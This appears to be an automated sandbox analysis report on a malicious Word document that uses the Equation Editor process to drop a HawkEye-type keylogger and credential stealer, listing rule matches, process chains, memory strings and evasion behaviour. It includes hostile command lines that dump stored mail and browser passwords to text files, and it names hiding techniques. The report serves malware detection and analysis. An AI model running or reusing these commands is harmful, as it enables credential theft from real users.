            Source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.2689414.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.InstallUtil.exe.2684de0.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000002.2363914554.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'zfWNmoVCmw9cYxvRPzpOe7yARVOHExi6TsOCR63LGMs+Lv0nLSEyXoiEOPiEzRyN', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@10/15@5/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$0072109764552.docJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD9EA.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\name.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: 280072109764552.docReversingLabs: Detection: 31%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
            Source: C:\Users\user\AppData\Roaming\name.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
            Source: C:\Users\user\AppData\Roaming\name.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\name.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: 280072109764552.docStatic file information: File size 2202571 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: InstallUtil.pdb source: name.exe, 00000004.00000002.2153168728.0000000006870000.00000004.00000001.sdmp, InstallUtil.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_0003260D push cs; iretd
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00035610 push esi; iretd
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_0003401C pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00035A34 push eax; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00035A47 push eax; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00034E93 pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00032894 push ds; iretd
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00034D05 pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00036D50 push es; ret
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00033955 push esi; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00035992 push eax; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00033FDC pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_000355E2 push 664C7BE7h; iretd
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4_2_00034FE7 push 680E75D9h; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411879 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004118A0 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004118A0 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442871 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442A90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442A90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00446E54 push eax; ret
            Source: 4.2.name.exe.30000.0.unpack, Sz9/n0P.csHigh entropy of concatenated method names: '.ctor', 'o5G', 'k2L', 'd4D', 'k5R', 'k5G', 'p5N', 'Lk2', 'c6F', 'Ri8'
            Source: C:\Users\user\AppData\Roaming\name.exeFile created: C:\Users\user\AppData\Local\Temp\InstallUtil.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\name.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Changes the view of files in windows explorer (hidden files and folders)Show sources
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\AppData\Roaming\name.exeFile opened: C:\Users\user\AppData\Roaming\name.exe\:Zone.Identifier read attributes | delete
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
